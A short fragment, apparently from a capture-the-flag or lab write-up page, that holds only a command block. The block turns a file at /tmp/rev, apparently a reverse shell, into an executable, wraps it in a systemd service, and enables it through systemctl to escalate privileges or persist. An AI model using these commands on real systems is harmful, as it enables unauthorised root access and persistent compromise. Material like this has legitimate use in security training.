Last updated 9 months ago
Was this helpful?
cat /tmp/rev > shell chmod +x shell echo '[Service] Type=oneshot ExecStart=/home/pepper/shell [Install] WantedBy=multi-user.target' > adot8.service /bin/systemctl enable --now /home/pepper/adot8.service /bin/systemctl start adot8.service